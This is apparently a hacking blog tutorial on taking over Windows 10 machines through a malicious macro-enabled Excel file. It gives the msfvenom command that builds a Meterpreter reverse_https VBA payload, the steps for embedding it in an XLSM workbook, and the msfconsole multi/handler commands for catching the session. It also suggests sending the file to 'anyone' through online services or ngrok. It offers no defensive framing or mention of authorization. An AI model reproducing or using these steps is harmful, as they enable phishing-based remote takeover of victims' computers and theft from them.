Exploit Windows 10 with Excel File ( Macros )

Hey Folks, in this tutorial we will show you the way through which we can easily exploit any windows machine using malicious macros. We know that many people will be familiar with macros because it is a part of Microsoft Excel software and sometimes we use Excel in our routine, but if you are not aware of it, then first we talk about macros.

What is Macros?

A macro is an action or a set of actions that you can run as many times as you want. You can create and then run a macro that quickly applies these formatting changes to the cells you select.

Let’s take a look 🙂 !!

Create VBA Payload

First of all we have to generate a malicious VBA script. Let’s fire up the kali linux and execute the below command but make sure that you provide your localhost address in the command. After setting everything we execute the command to create a vba script.

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.13 lport=1234 -f vba

Done 🙂 !! The payload has been ready but now we have to inject this payload into “XLSM” file.

Q– But the question is, why do we have to create only malicious payloads in XLSM files ?

A – The XLSM file is a macro-enabled spreadsheet created by Microsoft Excel which is why we choose this format to embed its malicious VBA script inside it. Let’s boot the Excel software -> write any content in empty columns -> go to the “view” tab -> click on macros and select its sub menu option “view macros“.

After that a new tab will appear on the screen as shown in the given figure, in which we have to enter any name to create a macro and then click on the “create” button.

Alright 🙂 !! Now we will come back to kali linux machine, copy the payload that we created earlier and paste the entire code here. But remember to clear everything before pasting the code.

After successfully pasting the entire code, we press both “CTRL + S” keys simultaneously at the same time to save the document on the same tab. After that we enter the name of the document and select the type of documents to “Excel Macro-enabled Workbook“.

Done 😛 !! Finally, a “xlsm” file format malicious document has agreed to give us access to the victim machine. Now you can send it to anyone through online services or using ngrok service in kali linux and take a meterpreter session of its entire system.

Hmm 🙂 !! Again we have to come back to our operating system kali linux and setup the multi-handler to catch up the meterpreter session of victim machine.

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 1234
run

Victim ( Demonstration )

When the victim opens this document, they receive a security warning as shown in the image below, but as soon as the victim clicks the “Enable Content” button, all macros are allowed and we get the meterpreter session.

Amazing 😛 !! That’s what we thought ! as you can see, after users enable macros permission, we get a meterpreter session of their entire system.

Similarly in our upcoming article we will demonstrate the same thing with different -2 methods.